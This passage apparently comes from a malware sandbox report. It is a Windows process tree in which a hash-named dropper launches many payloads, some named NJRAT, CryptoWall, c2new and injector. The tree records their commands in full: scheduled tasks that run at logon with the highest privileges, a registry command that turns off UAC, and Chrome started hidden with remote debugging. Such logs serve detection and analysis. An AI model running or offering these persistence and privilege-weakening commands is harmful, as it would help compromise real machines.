- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Realtek HD Audio Manager" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:11328
- C:\Users\Admin\Desktop\Files\build.exe
  "C:\Users\Admin\Desktop\Files\build.exe"
  2⤵
  PID:13012
- C:\Users\Admin\Desktop\Files\1.exe
  "C:\Users\Admin\Desktop\Files\1.exe"
  2⤵
  PID:22188

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:3792
- C:\Users\Admin\Desktop\Files\wow.exe
  "C:\Users\Admin\Desktop\Files\wow.exe"
  2⤵
  PID:11160
- C:\Users\Admin\Desktop\Files\WindowsServices.exe
  "C:\Users\Admin\Desktop\Files\WindowsServices.exe"
  2⤵
  PID:10388
- - C:\Windows\WindowsServices.exe
    "C:\Windows\WindowsServices.exe"
    3⤵
    PID:14804
- C:\Users\Admin\Desktop\Files\injector.exe
  "C:\Users\Admin\Desktop\Files\injector.exe"
  2⤵
  PID:13120
- C:\Users\Admin\Desktop\Files\support.client.exe
  "C:\Users\Admin\Desktop\Files\support.client.exe"
  2⤵
  PID:12524
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:16140
- C:\Users\Admin\Desktop\Files\windowshost.exe
  "C:\Users\Admin\Desktop\Files\windowshost.exe"
  2⤵
  PID:15748
- C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe
  "C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe"
  2⤵
  PID:5884
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:21340
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:20880

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:3040

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:1908
- C:\Users\Admin\Desktop\Files\Solara_Protect.exe
  "C:\Users\Admin\Desktop\Files\Solara_Protect.exe"
  2⤵
  PID:13136
- C:\Users\Admin\Desktop\Files\crypted.41.exe
  "C:\Users\Admin\Desktop\Files\crypted.41.exe"
  2⤵
  PID:14296
- - C:\Users\Admin\Desktop\Files\crypted.41.exe
    "C:\Users\Admin\Desktop\Files\crypted.41.exe"
    3⤵
    PID:15896
- - C:\Users\Admin\Desktop\Files\crypted.41.exe
    "C:\Users\Admin\Desktop\Files\crypted.41.exe"
    3⤵
    PID:16264
- C:\Users\Admin\Desktop\Files\c2new.exe
  "C:\Users\Admin\Desktop\Files\c2new.exe"
  2⤵
  PID:16756

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:7264
- C:\Users\Admin\Desktop\Files\diskutil.exe
  "C:\Users\Admin\Desktop\Files\diskutil.exe"
  2⤵
  PID:10800
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:10380
- C:\Users\Admin\Desktop\Files\NJRAT%20DANGEROUS.exe
  "C:\Users\Admin\Desktop\Files\NJRAT%20DANGEROUS.exe"
  2⤵
  PID:23544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
PID:7692
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:10080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4940 -ip 4940
1⤵
PID:7868

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:8748
- C:\Users\Admin\Desktop\Files\file5.exe
  "C:\Users\Admin\Desktop\Files\file5.exe"
  2⤵
  PID:16356
- - C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE
    "C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"
    3⤵
    PID:17164
- C:\Users\Admin\Desktop\Files\TPB-ACTIVATOR-1.exe
  "C:\Users\Admin\Desktop\Files\TPB-ACTIVATOR-1.exe"
  2⤵
  PID:2132
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:13684
- C:\Users\Admin\Desktop\Files\njSilent.exe
  "C:\Users\Admin\Desktop\Files\njSilent.exe"
  2⤵
  PID:18836

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:8836
- C:\Users\Admin\Desktop\Files\AA_v3.exe
  "C:\Users\Admin\Desktop\Files\AA_v3.exe"
  2⤵
  PID:2772

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9072
- C:\Users\Admin\Desktop\Files\Client-built4.exe
  "C:\Users\Admin\Desktop\Files\Client-built4.exe"
  2⤵
  PID:12388
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "kazeku" /sc ONLOGON /tr "C:\Program Files\kazeku\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:15856
- - C:\Program Files\kazeku\Client.exe
    "C:\Program Files\kazeku\Client.exe"
    3⤵
    PID:17800
- C:\Users\Admin\Desktop\Files\CrSpoof.exe
  "C:\Users\Admin\Desktop\Files\CrSpoof.exe"
  2⤵
  PID:14992
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c "botnet.bat"
    3⤵
    PID:12296
- C:\Users\Admin\Desktop\Files\popapoers.exe
  "C:\Users\Admin\Desktop\Files\popapoers.exe"
  2⤵
  PID:16576

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9088
- C:\Users\Admin\Desktop\Files\random.exe
  "C:\Users\Admin\Desktop\Files\random.exe"
  2⤵
  PID:18192

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9168
- C:\Users\Admin\Desktop\Files\testme.exe
  "C:\Users\Admin\Desktop\Files\testme.exe"
  2⤵
  PID:16516
- C:\Users\Admin\Desktop\Files\sunset1.exe
  "C:\Users\Admin\Desktop\Files\sunset1.exe"
  2⤵
  PID:5952
- C:\Users\Admin\Desktop\Files\GoodFrag.exe
  "C:\Users\Admin\Desktop\Files\GoodFrag.exe"
  2⤵
  PID:9704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Bloxflip Predictor.exe
1⤵
PID:9204

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:4904

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:8508
- C:\Users\Admin\Desktop\Files\alex12312321.exe
  "C:\Users\Admin\Desktop\Files\alex12312321.exe"
  2⤵
  PID:18408
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:24468
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:16236
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:23012

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:3152
- C:\Users\Admin\Desktop\Files\jeditor.exe
  "C:\Users\Admin\Desktop\Files\jeditor.exe"
  2⤵
  PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
PID:4368
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  PID:9900

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9432
- C:\Users\Admin\Desktop\Files\bot.exe
  "C:\Users\Admin\Desktop\Files\bot.exe"
  2⤵
  PID:19392

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9444
- C:\Users\Admin\Desktop\Files\Device2.exe
  "C:\Users\Admin\Desktop\Files\Device2.exe"
  2⤵
  PID:16604
- C:\Users\Admin\Desktop\Files\logon.exe
  "C:\Users\Admin\Desktop\Files\logon.exe"
  2⤵
  PID:17864
- C:\Users\Admin\Desktop\Files\Server1.exe
  "C:\Users\Admin\Desktop\Files\Server1.exe"
  2⤵
  PID:9828

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9452
- C:\Users\Admin\Desktop\Files\jajajdva.exe
  "C:\Users\Admin\Desktop\Files\jajajdva.exe"
  2⤵
  PID:11648
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:14316
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:13116
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8d1f4dcf8,0x7ff8d1f4dd04,0x7ff8d1f4dd10
        5⤵
        
        PID:15428

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9468
- C:\Users\Admin\Desktop\Files\Document8.exe
  "C:\Users\Admin\Desktop\Files\Document8.exe"
  2⤵
  PID:12280

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9500

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9648
- C:\Users\Admin\Desktop\Files\AdaptorOvernight.exe
  "C:\Users\Admin\Desktop\Files\AdaptorOvernight.exe"
  2⤵
  PID:20632

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:10104
- C:\Users\Admin\Desktop\Files\sharp.exe
  "C:\Users\Admin\Desktop\Files\sharp.exe"
  2⤵
  PID:17484
- C:\Users\Admin\Desktop\Files\Neverlose%20Loader.exe
  "C:\Users\Admin\Desktop\Files\Neverlose%20Loader.exe"
  2⤵
  PID:19096
- C:\Users\Admin\Desktop\Files\esign-app.exe
  "C:\Users\Admin\Desktop\Files\esign-app.exe"
  2⤵
  PID:13256
- - C:\Users\Admin\AppData\Local\Temp\is-NDLDC.tmp\esign-app.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-NDLDC.tmp\esign-app.tmp" /SL5="$308B2,1592193,247808,C:\Users\Admin\Desktop\Files\esign-app.exe"
    3⤵
    PID:23408

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:9724
- C:\Users\Admin\Desktop\Files\crypted.exe
  "C:\Users\Admin\Desktop\Files\crypted.exe"
  2⤵
  PID:18876
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:22664
- C:\Users\Admin\Desktop\Files\payload.exe
  "C:\Users\Admin\Desktop\Files\payload.exe"
  2⤵
  PID:24416

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:10304
- C:\Users\Admin\Desktop\Files\smell-the-roses.exe
  "C:\Users\Admin\Desktop\Files\smell-the-roses.exe"
  2⤵
  PID:18304
- C:\Users\Admin\Desktop\Files\example_win32_dx11.exe
  "C:\Users\Admin\Desktop\Files\example_win32_dx11.exe"
  2⤵
  PID:72
- C:\Users\Admin\Desktop\Files\CryptoWall.exe
  "C:\Users\Admin\Desktop\Files\CryptoWall.exe"
  2⤵
  PID:10112

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:11060
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 049C85D24D9FFE76676D0394D8D60B01 C
  2⤵
  PID:6796
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIBC56.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240712750 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    PID:10744

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:6732
- C:\Users\Admin\Desktop\Files\ApertureLab.exe
  "C:\Users\Admin\Desktop\Files\ApertureLab.exe"
  2⤵
  PID:17008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:8560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:9260

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:11592

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:11600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\app_data.exe
1⤵
PID:11664
- C:\ProgramData\app_data.exe
  C:\ProgramData\app_data.exe
  2⤵
  PID:15132

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:11872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\d5ca1cc7\d5ca1cc7.exe
1⤵
PID:12012
- C:\d5ca1cc7\d5ca1cc7.exe
  C:\d5ca1cc7\d5ca1cc7.exe
  2⤵
  PID:9820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\d5ca1cc7\d5ca1cc7.exe
1⤵
PID:12024
- C:\d5ca1cc7\d5ca1cc7.exe
  C:\d5ca1cc7\d5ca1cc7.exe
  2⤵
  PID:13736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\d5ca1cc7.exe
1⤵
PID:12048
- C:\Users\Admin\AppData\Roaming\d5ca1cc7.exe
  C:\Users\Admin\AppData\Roaming\d5ca1cc7.exe
  2⤵
  PID:13948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\d5ca1cc7.exe
1⤵
PID:12060
- C:\Users\Admin\AppData\Roaming\d5ca1cc7.exe
  C:\Users\Admin\AppData\Roaming\d5ca1cc7.exe
  2⤵
  PID:15840

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:13020

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:13032

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:12108

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:12944

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:12888

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:7644
- C:\Users\Admin\Desktop\Files\CalcVaults.exe
  "C:\Users\Admin\Desktop\Files\CalcVaults.exe"
  2⤵
  PID:23656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:14144
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:16220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:14160
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:11380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13364
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:13820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13376
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:11572

C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe
C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe
1⤵
PID:13300

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:10660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13220
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:9604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13240
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\ljgksdtihd.exe
1⤵
PID:13688
- C:\Users\Admin\AppData\Roaming\ljgksdtihd.exe
  C:\Users\Admin\AppData\Roaming\ljgksdtihd.exe
  2⤵
  PID:18908

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:12400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:11760
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:11916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:13856
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:2564

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x000000000000047C 0x0000000000000480
1⤵
PID:13664

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:12744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:11564
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:3384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:14344
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:3196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:15056
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:17464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Files\fusca%20game.exe" ..
1⤵
PID:15076
- C:\Users\Admin\Desktop\Files\fusca%20game.exe
  C:\Users\Admin\Desktop\Files\fusca%20game.exe ..
  2⤵
  PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
PID:13568
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:8488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe
1⤵
PID:14052
- C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe
  C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe
  2⤵
  PID:17472

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
PID:7572

C:\Windows\system32\cmd.exe
